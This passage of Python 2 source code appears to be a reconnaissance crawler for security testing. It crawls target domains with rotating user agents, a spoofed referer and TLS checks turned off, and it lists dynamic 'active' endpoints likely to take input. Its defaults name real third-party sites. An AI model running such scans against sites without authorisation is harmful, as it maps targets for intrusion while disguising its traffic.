url.find('/') != -1: 35 | sameurl = 'www.' + re.findall(r'(?<=www.).*?(?=/)', url)[0] 36 | else: 37 | sameurl = url + '/' 38 | sameurl = 'www.' + re.findall(r'(?<=www.).*?(?=/)', sameurl)[0] 39 | print('the domain is:' + sameurl) 40 | return sameurl 41 | 42 | def requests_headers(): 43 | ''' 44 | Random UA for every requests && Use cookie to scan 45 | ''' 46 | user_agent = ['Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0', 47 | 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0', 48 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre', 49 | 'Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60','Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)', 50 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14', 51 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36', 52 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 53 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)', 54 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 55 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'] 56 | UA = random.choice(user_agent) 57 | headers = { 58 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 59 | 'User-Agent':UA,'Upgrade-Insecure-Requests':'1','Connection':'keep-alive','Cache-Control':'max-age=0', 60 | 'Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8', 61 | "Referer": "http://www.baidu.com/link?url=www.so.com&url=www.soso.com&&url=www.sogou.com"} 62 | return headers 63 | 64 | 65 | class linkQuence: 66 | def __init__(self): 67 | self.visited = [] #已访问过的url初始化列表 68 | self.unvisited = [] #未访问过的url初始化列表 69 | self.external_url=[] #外部链接 70 | 71 | def getVisitedUrl(self): #获取已访问过的url 72 | return self.visited 73 | def getUnvisitedUrl(self): #获取未访问过的url 74 | return self.unvisited 75 | def getExternal_link(self): 76 | return self.external_url #获取外部链接地址 77 | def addVisitedUrl(self,url): #添加已访问过的url 78 | return self.visited.append(url) 79 | def addUnvisitedUrl(self,url): #添加未访问过的url 80 | if url != '' and url not in self.visited and url not in self.unvisited: 81 | return self.unvisited.insert(0,url) 82 | def addExternalUrl(self,url): #添加外部链接列表 83 | if url!='' and url not in self.external_url: 84 | return self.external_url.insert(0,url) 85 | 86 | def removeVisited(self,url): 87 | return self.visited.remove(url) 88 | def popUnvisitedUrl(self): #从未访问过的url中取出一个url 89 | try: #pop动作会报错终止操作,所以需要使用try进行异常处理 90 | return self.unvisited.pop() 91 | except: 92 | return None 93 | def unvisitedUrlEmpty(self): #判断未访问过列表是不是为空 94 | return len(self.unvisited) == 0 95 | 96 | class Spider(): 97 | ''' 98 | 真正的爬取程序 99 | ''' 100 | def __init__(self,url,domain_url,urlprotocol): 101 | self.linkQuence = linkQuence() #引入linkQuence类 102 | self.linkQuence.addUnvisitedUrl(url) #并将需要爬取的url添加进linkQuence对列中 103 | self.current_deepth = 1 #设置爬取的深度 104 | self.domain_url = domain_url 105 | self.urlprotocol = urlprotocol 106 | 107 | def getPageLinks(self,url): 108 | ''' 109 | 获取页面中的所有链接 110 | ''' 111 | try: 112 | headers = requests_headers() 113 | content = requests.get(url, timeout=5, headers=headers, verify=False).text.encode('utf-8') 114 | links = [] 115 | tags = ['a', 'A', 'link', 'script', 'area', 'iframe', 'form'] # img 116 | tos = ['href', 'src', 'action'] 117 | if url[-1:] == '/': 118 | url = url[:-1] 119 | try: 120 | for tag in tags: 121 | for to in tos: 122 | link1 = re.findall(r'<%s.*?%s="(.*?)"' % (tag, to), str(content)) 123 | link2 = re.findall(r'<%s.*?%s=\'(.*?)\'' % (tag, to), str(content)) 124 | for i in link1: 125 | links.append(i) 126 | 127 | for i in link2: 128 | if i not in links: 129 | links.append(i) 130 | 131 | except Exception, e: 132 | print e 133 | print '[!] Get link error' 134 | pass 135 | return links 136 | except: 137 | return [] 138 | def getPageLinks_bak(self,url): 139 | ''' 140 | 获取页面中的所有链接 141 | ''' 142 | try: 143 | 144 | # pageSource=urllib2.urlopen(url).read() 145 | headers = requests_headers() 146 | time.sleep(0.5) 147 | pageSource = requests.get(url, timeout=5, headers=headers).text.encode('utf-8') 148 | pageLinks = re.findall(r'(?<=href=\").*?(?=\")|(?<=href=\').*?(?=\')', pageSource) 149 | # print pageLinks 150 | except: 151 | # print ('open url error') 152 | return [] 153 | return pageLinks 154 | 155 | def processUrl(self,url): 156 | ''' 157 | 判断正确的链接及处理相对路径为正确的完整url 158 | :return: 159 | ''' 160 | true_url = [] 161 | in_link = [] 162 | excludeext = ['.zip', '.rar', '.pdf', '.doc', '.xls', '.jpg', '.mp3', '.mp4','.png', '.ico', '.gif','.svg', '.jpeg','.mpg', '.wmv', '.wma','mailto','javascript','data:image'] 163 | for suburl in self.getPageLinks(url): 164 | exit_flag = 0 165 | for ext in excludeext: 166 | if ext in suburl: 167 | print "break:" + suburl 168 | exit_flag = 1 169 | break 170 | if exit_flag == 0: 171 | if re.findall(r'/', suburl): 172 | if re.findall(r':', suburl): 173 | true_url.append(suburl) 174 | else: 175 | true_url.append(self.urlprotocol + '://' + self.domain_url + '/' + suburl) 176 | else: 177 | true_url.append(self.urlprotocol + '://' + self.domain_url + '/' + suburl) 178 | 179 | for suburl in true_url: 180 | print('from:' + url + ' get suburl:' + suburl) 181 | 182 | return true_url 183 | 184 | def sameTargetUrl(self,url): 185 | same_target_url = [] 186 | for suburl in self.processUrl(url): 187 | if re.findall(self.domain_url,suburl): 188 | same_target_url.append(suburl) 189 | else: 190 | self.linkQuence.addExternalUrl(suburl) 191 | return same_target_url 192 | 193 | def unrepectUrl(self,url): 194 | ''' 195 | 删除重复url 196 | ''' 197 | unrepect_url = [] 198 | for suburl in self.sameTargetUrl(url): 199 | if suburl not in unrepect_url: 200 | unrepect_url.append(suburl) 201 | return unrepect_url 202 | 203 | def crawler(self,crawl_deepth=1): 204 | ''' 205 | 正式的爬取,并依据深度进行爬取层级控制 206 | ''' 207 | self.current_deepth=0 208 | print "current_deepth:", self.current_deepth 209 | while self.current_deepth < crawl_deepth: 210 | if self.linkQuence.unvisitedUrlEmpty():break 211 | links=[] 212 | while not self.linkQuence.unvisitedUrlEmpty(): 213 | visitedUrl = self.linkQuence.popUnvisitedUrl() 214 | if visitedUrl is None or visitedUrl == '': 215 | continue 216 | print("#"*30 + visitedUrl +" :begin"+"#"*30) 217 | for sublurl in self.unrepectUrl(visitedUrl): 218 | links.append(sublurl) 219 | # links = self.unrepectUrl(visitedUrl) 220 | self.linkQuence.addVisitedUrl(visitedUrl) 221 | print("#"*30 + visitedUrl +" :end"+"#"*30 +'\n') 222 | for link in links: 223 | self.linkQuence.addUnvisitedUrl(link) 224 | self.current_deepth += 1 225 | # print(self.linkQuence.visited) 226 | # print (self.linkQuence.unvisited) 227 | urllist=[] 228 | urllist.append("#" * 30 + ' VisitedUrl ' + "#" * 30) 229 | for suburl in self.linkQuence.getVisitedUrl(): 230 | urllist.append(suburl) 231 | urllist.append('\n'+"#" * 30 + ' UnVisitedUrl ' + "#" * 30) 232 | for suburl in self.linkQuence.getUnvisitedUrl(): 233 | urllist.append(suburl) 234 | urllist.append('\n'+"#" * 30 + ' External_link ' + "#" * 30) 235 | for sublurl in self.linkQuence.getExternal_link(): 236 | urllist.append(sublurl) 237 | urllist.append('\n'+"#" * 30 + ' Active_link ' + "#" * 30) 238 | actives = ['?', '.asp', '.jsp', '.php', '.aspx', '.do', '.action'] 239 | active_urls = [] 240 | for sublurl in urllist: 241 | for active in actives: 242 | if active in sublurl: 243 | active_urls.append(sublurl) 244 | break 245 | for active_url in active_urls: 246 | urllist.append(active_url) 247 | return urllist 248 | def writelog(log,urllist): 249 | filename=log 250 | outfile=open(filename,'w') 251 | for suburl in urllist: 252 | outfile.write(suburl+'\n') 253 | outfile.close() 254 | 255 | def urlspider(rooturl,crawl_deepth=3): 256 | # ext_link = [] 257 | urlprotocol = url_protocol(url) 258 | domain_url = same_url(urlprotocol,url) 259 | print "domain_url:"+domain_url 260 | spider = Spider(url,domain_url,urlprotocol) 261 | urllist=spider.crawler(crawl_deepth) 262 | writelog(domain_url,urllist) 263 | print '-' * 20 + url + '-' * 20 264 | for sublurl in urllist: 265 | print sublurl 266 | print '\n' + 'Result record in:' + domain_url + '.txt' 267 | 268 | def SRC_spider(url, log,crawl_deepth=3): 269 | # url = 'http://2014.liaocheng.gov.cn' 270 | 271 | urlprotocol = url_protocol(url) 272 | domain_url = same_url(urlprotocol, url) 273 | print "domain_url:" + domain_url 274 | spider = Spider(url,domain_url,urlprotocol) 275 | urllist = spider.crawler(crawl_deepth) 276 | writelog(log, urllist) 277 | print '-' * 20 + url + '-' * 20 278 | # for sublurl in urllist: 279 | # print sublurl 280 | print '\n' + 'Result record in:' + log 281 | 282 | 283 | if __name__ == '__main__': 284 | url = 'http://www.wuhubtv.com' 285 | os.system("mkdir sp_result") 286 | craw_deepth =5 287 | usage = ''' 288 | python spider_v3.py 1.txt 5 --> 1.txt为待爬取的网站地址,5为爬取深度,可以不设,默认为5。 289 | ''' 290 | try: 291 | if len(sys.argv) ==2: 292 | url = sys.argv[1] 293 | craw_deepth = 5 294 | elif len(sys.argv) ==3: 295 | url = sys.argv[1] 296 | craw_deepth = int(sys.argv[2]) 297 | else: 298 | print usage 299 | exit(0) 300 | with open (sys.argv[1]) as f: 301 | for a in f: 302 | url = a.strip() 303 | print url 304 | if url.find("http") >= 0: 305 | pass 306 | else: 307 | url = "http://"+url 308 | urlprotocol = url_protocol(url) 309 | domain_url = same_url(urlprotocol, url) 310 | print "domain_url:" + domain_url 311 | spider = Spider(url, domain_url, urlprotocol) 312 | urllist = spider.crawler(craw_deepth) 313 | writelog("./sp_result/"+domain_url+'.txt', urllist) 314 | # print urllist 315 | print '-' * 20 + url + '-' * 20 316 | for sublurl in urllist: 317 | print sublurl 318 | print len(urllist) 319 | print '\n' + 'Result record in:' + domain_url + '.txt' 320 | except: 321 | pass 322 | 323 | --------------------------------------------------------------------------------